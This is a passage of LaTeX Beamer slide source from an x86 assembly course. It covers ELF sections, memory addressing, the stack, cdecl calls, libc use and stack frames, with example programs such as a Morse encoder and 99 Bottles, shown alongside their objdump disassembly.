80483fd: 89 d9 mov %ebx,%ecx
80483ff: 89 c3 mov %eax,%ebx
8048401: 01 c8 add %ecx,%eax
8048403: 4f dec %edi
8048404: 75 f2 jne 80483f8 <fib_loop>
8048406: c3 ret
...
\end{customobjdumpcode}
\begin{itemize}
\item Main code is only 35 bytes!
\item Can easily be cut down to 28 bytes by optimizing the clears
\end{itemize}
\end{frame}
\section{Topic 4: Program Memory}
\begin{frame}[fragile,t]
\frametitle{Static Allocation in C}
\begin{itemize}
\item From C, we're used to uninitialized and initialized static memory allocations
\end{itemize}
\vs
\begin{ccode}
/* Uninitialized static allocation, read-write */
char buff[1024];
/* Initialized static allocations, read-write */
int foo = 5;
char str[] = "Hello World";
\end{ccode}
\pause
\begin{ccode}
/* Trickier example: */
char *p = "Hello World";
/* char *p is an initialized static allocation, read-write */
/* "Hello World" is initialized static allocation, READ-ONLY */
int main(void) {
return 0;
}
\end{ccode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Static Allocation in Assembly}
\begin{itemize}
\item Responsible for manually specifying the contents of memory
\item Description is stored in a binary format like ELF, \\ in terms of sections, r/w/x permissions, and sizes
\item OS is responsible for setting up memory as described in ELF binary in {\ttfamily execve()}
\pause
\vs\vs\vs
\item {\ttfamily section \textbf{.text}}: \textbf{read-only executable} program instructions
\item {\ttfamily section \textbf{.rodata}}: initialized statically allocated \textbf{read-only data}
\item {\ttfamily section \textbf{.data}}: initialized statically allocated \textbf{read-write data}
\item {\ttfamily section \textbf{.bss}}: uninitialized statically allocated \textbf{read-write data}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Memory Layout}
\mvs
\begin{figure}
\centering
\includegraphics[height=0.75\paperheight]{figures/memlayout.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Static Allocation (example-static-alloc.S)}
\mvs
\begin{gascode}
# Put some instructions in .text
.section .text
_start:
nop
nop
nop
nop
# Put a string in .rodata
.section .rodata
anotherStr: .ascii "Another string\n\0"
# Put some magic bytes in .data
.section .data
magicByte1: .byte 0xaa
magicBytes2: .byte 0x55, 0x10
magicDWord: .long 0xdeadbeef
magicStr: .ascii "String!\0"
# Reserve 1024 uninitialized bytes in .bss
.section .bss
.comm Buffer, 1024
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Static Allocation (example-static-alloc.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-static-alloc.S -o example-static-alloc.o
$ ld example-static-alloc.o -o example-static-alloc
$ objdump -D example-static-alloc
Disassembly of section .text:
08048074 <_start>:
8048074: 90 nop
8048075: 90 nop
8048076: 90 nop
8048077: 90 nop
Disassembly of section .rodata:
08048078 <anotherStr>:
8048078: 41 inc %ecx
8048079: 6e outsb %ds:(%esi),(%dx)
804807a: 6f outsl %ds:(%esi),(%dx)
804807b: 74 68 je 80480e5 <anotherStr+0x6d>
804807d: 65 gs
804807e: 72 20 jb 80480a0 <anotherStr+0x28>
8048080: 73 74 jae 80480f6 <anotherStr+0x7e>
8048082: 72 69 jb 80480ed <anotherStr+0x75>
8048084: 6e outsb %ds:(%esi),(%dx)
8048085: 67 0a 00 or (%bx,%si),%al
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Static Allocation (example-static-alloc.S) Disassembly}
\mvs
\begin{customobjdumpcode}
Disassembly of section .data:
08049088 <magicByte1>:
8049088: aa stos %al,%es:(%edi)
08049089 <magicBytes2>:
8049089: 55 push %ebp
804908a: 10 ef adc %ch,%bh
0804908b <magicDWord>:
804908b: ef out %eax,(%dx)
804908c: be ad de 53 74 mov $0x7453dead,%esi
0804908f <magicStr>:
804908f: 53 push %ebx
8049090: 74 72 je 8049104 <Buffer+0x64>
8049092: 69 .byte 0x69
8049093: 6e outsb %ds:(%esi),(%dx)
8049094: 67 21 00 and %eax,(%bx,%si)
Disassembly of section .bss:
080490a0 <Buffer>:
...
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Viewing Sections}
\mvs
\begin{itemize}
\item We can also view the program's sections with {\ttfamily objdump -x}.
\end{itemize}
\begin{textcode*}{fontsize=\fontsize{9}{8}}
$ objdump -x example-static-alloc
example-static-alloc: file format elf32-i386
example-static-alloc
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x08048074
Program Header:
LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
filesz 0x00000088 memsz 0x00000088 flags r-x
LOAD off 0x00000088 vaddr 0x08049088 paddr 0x08049088 align 2**12
filesz 0x0000000f memsz 0x00000418 flags rw-
Sections:
Idx Name Size VMA LMA File off Algn
0 .text 00000004 08048074 08048074 00000074 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
1 .rodata 00000010 08048078 08048078 00000078 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
2 .data 0000000f 08049088 08049088 00000088 2**2
CONTENTS, ALLOC, LOAD, DATA
3 .bss 00000400 080490a0 080490a0 00000097 2**4
ALLOC
...
\end{textcode*}
\end{frame}
\section{Topic 5: Reading/Writing Memory}
\begin{frame}[fragile,t]
\frametitle{Directly Accessing Memory}
\begin{itemize}
\item We've already seen how to directly access memory addresses with their label representations
\end{itemize}
\begin{gascode}
.section .text
movl magicDword, %eax # %eax = *(magicDword)
andb byteMask, %al # %al = %al & *(byteMask)
movl %eax, modifiedDword # *(modifiedDword) = %eax
.section .rodata # Read-only!
magicDword: .long 0xffffffff
byteMask: .byte 0x55
.section .bss # Uninitialized read-write
.comm modifiedDword, 4
\end{gascode}
\pause
\begin{itemize}
\item The memory addresses are {\bf directly encoded} in the instructions:
\end{itemize}
\begin{customobjdumpcode}
Disassembly of section .text:
8048074: a1 85 80 04 08 mov 0x8048085,%eax
8048079: 22 05 89 80 04 08 and 0x8048089,%al
804807f: a3 8c 90 04 08 mov %eax,0x804908c
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Indirect Memory Access}
\begin{itemize}
\item Many x86 instructions are capable of complex indirect addressing: \\
{\ttfamily {\footnotesize *(base register + (offset register * multiplier) + displacement)}}
\item GAS Syntax: \\
{\ttfamily {\footnotesize displacement(base register, offset register, multiplier)}}
\pause
\begin{itemize}
\item Base register can be any general purpose register
\item Offset register can be any general purpose register except {\ttfamily \%esp}
\item Multiplier can be 1, 2, 4, 8
\item Displacement is signed, 8 or 32 bits
\end{itemize}
\pause
\item Not all fields are required. A simplified indirect address: {\ttfamily (\%ebx) }
\begin{gascode}
movl %eax, 8(%ebx, %ecx, 4) # *(%ebx + 4*%ecx + 8) = %eax
movl %eax, 12(%ebp) # *(%ebp + 12) = %eax
movl %eax, (%ebx) # *(%ebx) = %eax
\end{gascode}
\pause
\item Makes it easy to address tables/structures
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Indirect Memory Access (example-indirect-mem.S)}
\mvs
\begin{gascode}
.section .text
_start:
movl $tableStart, %ebx # Pointer to table start
# We are moving the *value*
# $tableStart, this is not a
# memory access!
movl $0, %ecx
loop:
movl (%ebx, %ecx, 4), %eax # %eax = *(%ebx + 4*%ecx)
notl %eax # %eax = ~%eax
movl %eax, (%ebx, %ecx, 4) # *(%ebx + 4*%ecx) = %eax
incl %ecx
cmpl $10, %ecx
jl loop
.section .data
tableStart: .long 0x00000000, 0x00000001
.long 0x00000002, 0x00000003
.long 0x00000004, 0x00000005
.long 0x00000006, 0x00000007
.long 0x00000008, 0x00000009
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Ex. Indirect Memory Access (example-indirect-mem.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-indirect-mem.S -o example-indirect-mem.o
$ ld example-indirect-mem.o -o example-indirect-mem
$ objdump -D example-indirect-mem
Disassembly of section .text:
08048074 <_start>:
8048074: bb 90 90 04 08 mov $0x8049090,%ebx
8048079: b9 00 00 00 00 mov $0x0,%ecx
0804807e <loop>:
804807e: 8b 04 8b mov (%ebx,%ecx,4),%eax
8048081: f7 d0 not %eax
8048083: 89 04 8b mov %eax,(%ebx,%ecx,4)
8048086: 41 inc %ecx
8048087: 83 f9 0a cmp $0xa,%ecx
804808a: 7c f2 jl 804807e <loop>
804808c: 90 nop
Disassembly of section .data:
08049090 <tableStart>:
8049090: 00 00 add %al,(%eax)
8049092: 00 00 add %al,(%eax)
8049094: 01 00 add %eax,(%eax)
8049096: 00 00 add %al,(%eax)
8049098: 02 00 add (%eax),%al
...
\end{customobjdumpcode}
\end{frame}
\section{Program Example: Morse Encoder}
\begin{frame}[fragile,t]
\frametitle{Morse Encoder (morse\_encoder.S)}
\mvs
\begin{gascode}
.section .text
.global main
main:
movl $inputWord, %esi # Pointer to input word
movl $outputMorse, %edi # Pointer to output morse
movl $0, %eax # Clear %eax
encode_loop:
movb (%esi), %al # Read the next byte of input to %al
incl %esi # Increment input word pointer
testb %al, %al # If we encounter a null byte
jz finished # jump to finished
subb $'A, %al # Adjust %al to be relative to 'A'
movl $MorseTable, %ecx # Initialize %ecx morse table pointer
lookup:
# Read the next code character into %bl
movb (%ecx, %eax, 8), %bl # %bl = *(%ecx + 8*%eax)
cmpb $' , %bl # If we encounter a space
je lookup_done # break out of the loop
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Morse Encoder (morse\_encoder.S) Continued}
\mvs
\begin{gascode}
# (inside lookup loop)
movb %bl, (%edi) # Copy the code character to our output morse
incl %edi # Increment output morse pointer
incl %ecx # Increment our table pointer
jmp lookup # Loop
lookup_done:
movb $' , (%edi) # Copy a space to the output morse
incl %edi # Increment output morse pointer
movb $' , (%edi) # ...
incl %edi # ...
movb $' , (%edi) # ...
incl %edi # ...
jmp encode_loop
finished:
movb $0x00, (%edi) # Append a null byte to the output morse
incl %edi # Increment output morse pointer
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Morse Encoder (morse\_encoder.S) Continued}
\mvs
\begin{gascode}
pushl $outputMorse # Call puts(outputMorse);
call puts
addl $4, %esp
movl $0, %eax # Return 0
ret
.section .rodata
# Morse code lookup table
MorseTable:
.ascii ".-      ", "-...    ", "-.-.    ", "-..     " # A, B, C, D
.ascii ".       ", "..-.    ", "--.     ", "....    " # E, F, G, H
.ascii "..      ", ".---    ", "-.-     ", ".-..    " # I, J, K, L
.ascii "--      ", "-.      ", "---     ", ".--.    " # M, N, O, P
.ascii "--.-    ", ".-.     ", "...     ", "-       " # Q, R, S, T
.ascii "..-     ", "...-    ", ".--     ", "-..-    " # U, V, W, X
.ascii "-.--    ", "--..    " # Y, Z
.section .data
# Input Word Storage
inputWord: .ascii "HELLO\0"
.section .bss
# Output Morse Code Storage
.comm outputMorse, 64
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Morse Encoder (morse\_encoder.S) Runtime}
\mvs
\begin{textcode}
$ as morse_encoder.S -o morse_encoder.o
$ gcc morse_encoder.o -o morse_encoder
$ ./morse_encoder
.... . .-.. .-.. ---
$
\end{textcode}
\end{frame}
\section{Topic 6: Stack}
\begin{frame}[fragile,t]
\frametitle{Automatic Allocation in C}
\begin{itemize}
\item From C, we're used to automatic memory allocations in functions and blocks \{ ... \} in general
\end{itemize}
\begin{ccode}
int main(void) {
int i; /* Automatic allocation */
char buff[8]; /* Automatic allocation */
while (1) {
int j; /* Automatic allocation */
...
}
return 0;
}
\end{ccode}
\begin{itemize}
\item These allocations typically live on the {\bf stack}.
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{LIFO Stack Data Structure}
\begin{figure}
\centering
\includegraphics[height=0.60\paperheight]{figures/lifostack.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{x86 Stack}
\begin{figure}
\centering
\includegraphics[height=0.4\paperheight]{figures/x86stack.png}
\end{figure}
\begin{itemize}
\item Implemented in hardware with a ``stack pointer'' {\ttfamily \%esp} \\ and a chunk of memory
\item x86 stack is {\bf last in first out}, {\bf descending}, and \\ {\ttfamily \%esp} {\bf points to allocated memory}
\item OS sets up valid {\ttfamily \%esp} at program start
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Push to Stack}
\begin{figure}
\centering
\includegraphics[height=0.6\paperheight]{figures/x86stackpush.png}
\end{figure}
\begin{itemize}
\item We can push by adjusting and writing to {\ttfamily \%esp}, \\ or with the atomic {\ttfamily push} instruction
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Pop from Stack}
\begin{figure}
\centering
\includegraphics[height=0.6\paperheight]{figures/x86stackpop.png}
\end{figure}
\begin{itemize}
\item We can pop by reading from and adjusting {\ttfamily \%esp}, \\ or with the atomic {\ttfamily pop} instruction
\end{itemize}
\end{frame}
\begin{frame}[fragile]
\frametitle{Stack Batch Allocation / Deallocation}
\mvs
\begin{figure}
\centering
\includegraphics[width=0.90\textwidth]{figures/x86stackalloc.png}
\end{figure}
\begin{itemize}
\item We can batch allocate/deallocate space by simply adjusting {\ttfamily \%esp}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Stack Usage (example-stack.S)}
\mvs
\begin{gascode}
# Stack is now
# | ... | <-- %esp = 0x8xxxxxxx
movl $0x05, %eax # Load 0x00000005 into %eax
pushl %eax # Push dword 0x00000005 onto the stack
incl %eax # %eax += 1
pushl %eax # Push dword 0x00000006 onto the stack
pushl $0xdeadbeef # Push dword 0xdeadbeef onto the stack
# Stack is now
# | ... |
# | 0x00000005 |
# | 0x00000006 |
# | 0xdeadbeef | <-- %esp = 0x8xxxxxxx
popl %ebx # Pop dword off of the stack,
# %ebx = 0xdeadbeef now
# Stack is now
# | ... |
# | 0x00000005 |
# | 0x00000006 | <-- %esp = 0x8xxxxxxx
# | 0xdeadbeef |
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Stack Usage (example-stack.S)}
\mvs
\begin{gascode}
# Stack is now
# | ... |
# | 0x00000005 |
# | 0x00000006 | <-- %esp = 0x8xxxxxxx
# | 0xdeadbeef |
addl $4, %esp # Deallocate 4 bytes off of the stack
# Stack is now
# | ... |
# | 0x00000005 | <-- %esp = 0x8xxxxxxx
# | 0x00000006 |
# | 0xdeadbeef |
movl $0xaaaaaaaa, (%esp) # Write 0xaaaaaaaa to the stack
# Stack is now
# | ... |
# | 0xaaaaaaaa | <-- %esp = 0x8xxxxxxx
# | 0x00000006 |
# | 0xdeadbeef |
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Stack Usage (example-stack.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-stack.S -o example-stack.o
$ ld example-stack.o -o example-stack
$ objdump -D example-stack
Disassembly of section .text:
08048054 <_start>:
8048054: b8 05 00 00 00 mov $0x5,%eax
8048059: 50 push %eax
804805a: 40 inc %eax
804805b: 50 push %eax
804805c: 68 ef be ad de push $0xdeadbeef
8048061: 5b pop %ebx
8048062: 83 c4 04 add $0x4,%esp
8048065: c7 04 24 aa aa aa aa movl $0xaaaaaaaa,(%esp)
...
\end{customobjdumpcode}
\end{frame}
\section{Topic 7: Functions and cdecl Convention}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily call} and {\ttfamily ret}}
\mvs
\begin{itemize}
\item {\ttfamily jmp <label>} merely updates {\ttfamily \%eip} to address of {\ttfamily <label>}
\item {\ttfamily call <label>} pushes a return address onto the stack, then jumps to {\ttfamily <label>}
\item {\ttfamily ret} pops the return address off the stack, and jumps to it
\end{itemize}
\begin{gascode}
# Stack is now
# | ... |
movl $0, %eax
call addOneToEax
# Stack is once again
# | ... |
call addOneToEax
call addOneToEax
# %eax is now 3
...
addOneToEax:
# Stack is now
# | ... |
# | retaddr | <- %esp
incl %eax
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Function Arguments on the Stack}
\mvs
\begin{itemize}
\item Arguments can be passed on the stack to functions
\end{itemize}
\begin{gascode}
pushl $5
call doubleArg
# %eax is now 10
...
doubleArg:
# Stack is now
# | ... |
# | 0x00000005 | <- %esp+4
# | retaddr | <- %esp
movl 4(%esp), %eax # %eax = *(%esp+4)
addl %eax, %eax # %eax += %eax
ret
\end{gascode}
\begin{itemize}
\item or via registers?
\end{itemize}
\begin{gascode}
movl $5, %eax
# %eax is 5
call doubleArg
# %eax is now 10
doubleArg:
addl %eax, %eax # %eax += %eax
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily cdecl} Calling Convention}
\begin{itemize}
\item How can we ensure that our CPU state \\ ({\ttfamily \%eax, \%ebx, \%ecx, \%edx, \%edi, ...}) \\ doesn't get corrupted when a function needs to use those registers to do useful work?
\pause
\item How should we pass arguments to functions?
\begin{itemize}
\item Fixed memory addresses? Stack? Registers?
\end{itemize}
\pause
\item GCC on Linux uses the {\ttfamily cdecl} calling convention
\begin{itemize}
\item function arguments pushed onto the stack from right to left
\item {\ttfamily \%eax, \%ecx, \%edx} can be used by the function \\ (must be preserved by caller if necessary)
\item other registers are preserved by function
\item return value in {\ttfamily \%eax}
\item function arguments pushed onto the stack must be cleaned up by caller
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example {\ttfamily cdecl} Calling Convention (example-cdecl.S)}
\begin{gascode}
.section .text
# sumThreeNumbers(*magicNumber, 5, 12);
pushl $12 # Push 0x0000000C
pushl $5 # Push 0x00000005
pushl magicNumber # Push *magicNumber
call sumThreeNumbers
addl $12, %esp # Clean up arguments off of the stack
# %eax is 59
sumThreeNumbers:
# Stack is now
# | ... |
# | 12 | <- %esp+12
# | 5 | <- %esp+8
# | 42 | <- %esp+4
# | retaddr | <- %esp
movl $0, %eax # Clear %eax
addl 4(%esp), %eax # %eax += *(%esp+4)
addl 8(%esp), %eax # %eax += *(%esp+8)
addl 12(%esp), %eax # %eax += *(%esp+12)
ret
.section .data
magicNumber: .long 42
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example {\ttfamily cdecl} Calling Convention (example-cdecl.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-cdecl.S -o example-cdecl.o
$ ld example-cdecl.o -o example-cdecl
$ objdump -D example-cdecl
Disassembly of section .text:
08048074 <_start>:
8048074: 6a 0c push $0xc
8048076: 6a 05 push $0x5
8048078: ff 35 98 90 04 08 pushl 0x8049098
804807e: e8 03 00 00 00 call 8048086 <sumThreeNumbers>
8048083: 83 c4 0c add $0xc,%esp
08048086 <sumThreeNumbers>:
8048086: b8 00 00 00 00 mov $0x0,%eax
804808b: 03 44 24 04 add 0x4(%esp),%eax
804808f: 03 44 24 08 add 0x8(%esp),%eax
8048093: 03 44 24 0c add 0xc(%esp),%eax
8048097: c3 ret
Disassembly of section .data:
08049098 <magicNumber>:
8049098: 2a 00 sub (%eax),%al
...
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example {\ttfamily cdecl} with libc (example-libc.S)}
\vspace{-0.5em}
\begin{itemize}
\item {\ttfamily libc} library functions you use in C (strings, math, time, files, sockets, etc.) are all accessible in assembly when linking with libc
\item Follow the {\ttfamily cdecl} calling convention
\end{itemize}
\vspace{0.25em}
\begin{gascode}
.section .text
.global main
main:
# %eax = time(NULL);
pushl $0
call time
add $4, %esp
# *curtime = %eax
movl %eax, curtime
# %eax = localtime(&curtime);
pushl $curtime
call localtime
add $4, %esp
# %eax = asctime(%eax);
pushl %eax
call asctime
add $4, %esp
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example {\ttfamily cdecl} with libc (example-libc.S) Continued}
\begin{gascode}
# printf("%s", %eax); asctime()'s string already ends in '\n'
pushl %eax
pushl $formatStr
call printf
add $8, %esp
ret
.section .data
.comm curtime, 4
formatStr: .ascii "%s\0"
\end{gascode}
{\small Runtime:}
\begin{textcode}
$ as example-libc.S -o example-libc.o
$ gcc example-libc.o -o example-libc
$ ./example-libc
Wed Jan 25 16:13:27 2012
$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example {\ttfamily cdecl} with libc (example-libc.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-libc.S -o example-libc.o
$ gcc example-libc.o -o example-libc
$ objdump -D example-libc
Disassembly of section .text:
...
0804848c <main>:
804848c: 6a 00 push $0x0
804848e: e8 ad fe ff ff call 8048340 <time@plt>
8048493: 83 c4 04 add $0x4,%esp
8048496: a3 30 97 04 08 mov %eax,0x8049730
804849b: 68 30 97 04 08 push $0x8049730
80484a0: e8 cb fe ff ff call 8048370 <localtime@plt>
80484a5: 83 c4 04 add $0x4,%esp
80484a8: 50 push %eax
80484a9: e8 a2 fe ff ff call 8048350 <asctime@plt>
80484ae: 83 c4 04 add $0x4,%esp
80484b1: 50 push %eax
80484b2: 68 28 97 04 08 push $0x8049728
80484b7: e8 74 fe ff ff call 8048330 <printf@plt>
80484bc: 83 c4 08 add $0x8,%esp
80484bf: c3 ret
...
\end{customobjdumpcode}
\end{frame}
\section{Entry Points}
\begin{frame}[fragile,t]
\frametitle{Plain Entry Point}
\begin{itemize}
\item ELF binary specifies an entry point address for the OS to set initial {\ttfamily \%eip} to
\item {\ttfamily ld} expects this to be specified by the symbol {\ttfamily \_start}
\end{itemize}
\pause
\begin{gascode}
.section .text
.global _start # Export the symbol
_start:
nop # Off to a good start...
nop
nop
loop: jmp loop # Loop forever
\end{gascode}
\begin{textcode}
$ as test.S -o test.o
$ ld test.o -o test
$ ./test
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily libc} Entry Point}
\begin{itemize}
\item When we link with {\ttfamily libc}, it provides its own {\ttfamily \_start} to do some initialization, which eventually will call {\ttfamily main}
\item We provide a {\ttfamily main} and also a return back to libc with {\ttfamily ret} and a return value in {\ttfamily \%eax}
\item libc {\ttfamily exit()'s} with this value
\end{itemize}
\pause
\begin{gascode}
.section .text
.global main
main:
nop
nop
nop
movl $3, %eax # Return 3!
ret
\end{gascode}
\begin{textcode}
$ as test.S -o test.o
$ gcc test.o -o test # Use gcc to invoke ld to link with libc
$ ./test
$ echo $?
3
$
\end{textcode}
\end{frame}
\section{Program Example: 99 Bottles of Beer on the Wall}
\begin{frame}[fragile,t]
\mvs
\frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S)}
\begin{gascode}
.section .text
.global main
main:
movl $99, %eax # Start with 99 bottles!
# We could use a cdecl callee preserved register,
# but we'll make it hard on ourselves to practice
# caller saving/restoring
# printf(char *format, ...);
more_beer:
# Save %eax since it will get used by printf()
pushl %eax
# printf(formatStr1, %eax, %eax);
pushl %eax
pushl %eax
pushl $formatStr1 # *Address* of formatStr1
call printf
addl $12, %esp # Clean up the stack
# Restore %eax
popl %eax
# Drink a beer
decl %eax
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S)}
\begin{gascode}
# Save %eax
pushl %eax
# printf(formatStr2, %eax);
pushl %eax
pushl $formatStr2 # *Address* of formatStr2
call printf
addl $8, %esp # Clean up the stack
# Restore %eax
popl %eax
# Loop
test %eax, %eax
jnz more_beer
# printf(formatStr3);
pushl $formatStr3
call printf
addl $4, %esp
movl $0, %eax
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S)}
\begin{gascode}
.section .data
formatStr1:
.ascii "%d bottles of beer on the wall! %d bottles of beer!\n\0"
formatStr2:
.ascii "Take one down, pass it around, %d bottles of beer on the wall!\n\0"
formatStr3:
.ascii "No more bottles of beer on the wall!\n\0"
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S) Runtime}
\begin{textcode}
$ as 99_bottles_of_beer.S -o 99_bottles_of_beer.o
$ gcc 99_bottles_of_beer.o -o 99_bottles_of_beer
$ ./99_bottles_of_beer
99 bottles of beer on the wall! 99 bottles of beer!
Take one down, pass it around, 98 bottles of beer on the wall!
98 bottles of beer on the wall! 98 bottles of beer!
Take one down, pass it around, 97 bottles of beer on the wall!
97 bottles of beer on the wall! 97 bottles of beer!
...
3 bottles of beer on the wall! 3 bottles of beer!
Take one down, pass it around, 2 bottles of beer on the wall!
2 bottles of beer on the wall! 2 bottles of beer!
Take one down, pass it around, 1 bottles of beer on the wall!
1 bottles of beer on the wall! 1 bottles of beer!
Take one down, pass it around, 0 bottles of beer on the wall!
No more bottles of beer on the wall!
$
\end{textcode}
\end{frame}
\section{Topic 8: Stack Frames}
\begin{frame}[fragile,t]
\frametitle{Where did that argument go?}
\mvs
\begin{itemize}
\item Referring to arguments with {\ttfamily \%esp} in a function is easy, until you start moving around {\ttfamily \%esp} itself.
\end{itemize}
\begin{gascode}
pushl $5
call doSomething
addl $4, %esp
...
doSomething:
# Stack is now
# | ... |
# | 5 | <- %esp+4
# | retaddr | <- %esp
# Argument is at %esp+4
subl $12, %esp # Allocate 12 bytes on the stack
# Stack is now
# | ... |
# | 5 | <- %esp+16
# | retaddr | <- %esp+12
# | local var | <- %esp+8
# | local var | <- %esp+4
# | local var | <- %esp
# Argument is now at %esp+16 !
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Frame Pointer}
\begin{itemize}
\item What if we had an anchor point in our stack at the start of our function?
\item We could have constant offsets above to arguments and below to allocated variables from the anchor point
\pause
\item This is the conventional role of register {\ttfamily \%ebp}, the frame pointer \\ (also called base pointer)
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Frame Pointer Prologue}
\mvs
\begin{gascode}
pushl $5
call doSomething
addl $4, %esp
...
doSomething:
pushl %ebp # Function is responsible for saving this in cdecl!
movl %esp, %ebp # Anchor %ebp at the current %esp
# Stack is now
# | ... |
# | 5 | <- %esp+8 %ebp+8
# | retaddr | <- %esp+4 %ebp+4
# | old %ebp | <- %esp %ebp
# Argument is at %ebp+8
subl $12, %esp # Allocate 12 bytes on the stack
# Stack is now
# | ... |
# | 5 | <- %esp+20 %ebp+8
# | retaddr | <- %esp+16 %ebp+4
# | old %ebp | <- %esp+12 %ebp
# | local var | <- %esp+8 %ebp-4
# | local var | <- %esp+4 %ebp-8
# | local var | <- %esp %ebp-12
# Argument is still always at %ebp+8
# Allocated memory always at %ebp-4, %ebp-8, %ebp-12
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Frame Pointer Epilogue}
\begin{itemize}
\item To have a valid return address on the stack, we must reset {\ttfamily \%esp} to its previous value and pop the saved frame pointer
\item This conveniently also deallocates any space we allocated on the stack
\end{itemize}
\begin{gascode}
movl %ebp, %esp # Restore %esp, deallocating space on the stack
popl %ebp # Restore the frame pointer
ret # Return
\end{gascode}
\end{frame}
\begin{frame}[fragile]
\frametitle{Stack Frame in a Nutshell}
\mvs
\begin{figure}
\centering
\includegraphics[width=0.68\textwidth]{figures/stackframe.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example using the Frame Pointer (example-ebp.S)}
\mvs
\begin{gascode}
.section .text
_start:
pushl $22
pushl $20
pushl $42
pushl $3
call sumNumbers
addl $16, %esp
# %eax is now 84
# sumNumbers(int n, ...)
sumNumbers:
# Function prologue, save old frame pointer and setup new one
pushl %ebp
movl %esp, %ebp
movl $0, %eax # Clear %eax
movl $0, %ecx # Clear %ecx
movl 8(%ebp), %edx # Copy argument 1, n, into %edx
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example using the Frame Pointer (example-ebp.S)}
\mvs
\begin{gascode}
sumLoop:
# Add argument 2, 3, 4, ... n+1 in %eax
# Argument 2 starts at %ebp+12
addl 12(%ebp, %ecx, 4), %eax
incl %ecx
# Loop
decl %edx
jnz sumLoop
# Function epilogue, deallocate and restore old frame pointer
movl %ebp, %esp
popl %ebp
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example using the Frame Pointer (example-ebp.S) Disassembly}
\mvs
\begin{customobjdumpcode*}{fontsize=\fontsize{8}{8}}
$ as example-ebp.S -o example-ebp.o
$ ld example-ebp.o -o example-ebp
$ objdump -D example-ebp
Disassembly of section .text:
08048054 <_start>:
8048054: 6a 16 push $0x16
8048056: 6a 14 push $0x14
8048058: 6a 2a push $0x2a
804805a: 6a 03 push $0x3
804805c: e8 03 00 00 00 call 8048064 <sumNumbers>
8048061: 83 c4 10 add $0x10,%esp
08048064 <sumNumbers>:
8048064: 55 push %ebp
8048065: 89 e5 mov %esp,%ebp
8048067: b8 00 00 00 00 mov $0x0,%eax
804806c: b9 00 00 00 00 mov $0x0,%ecx
8048071: 8b 55 08 mov 0x8(%ebp),%edx
08048074 <sumLoop>:
8048074: 03 44 8d 0c add 0xc(%ebp,%ecx,4),%eax
8048078: 41 inc %ecx
8048079: 4a dec %edx
804807a: 75 f8 jne 8048074 <sumLoop>
804807c: 89 ec mov %ebp,%esp
804807e: 5d pop %ebp
804807f: c3 ret
...
\end{customobjdumpcode*}
\end{frame}
\part{2}
\section{Topic 9: Command-line Arguments}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily argc} and {\ttfamily **argv} on the stack}
\mvs
\begin{itemize}
\item In the {\ttfamily \_start} entry point, first argument on the stack is {\ttfamily argc}, followed by {\ttfamily argv[0], argv[1], ...}
\end{itemize}
\begin{gascode}
.section .text
.global _start
_start:
pushl %ebp
movl %esp, %ebp
# argc is at %ebp+4, argv[0] is at %ebp+8, argv[1] is at %ebp+12
\end{gascode}
\begin{itemize}
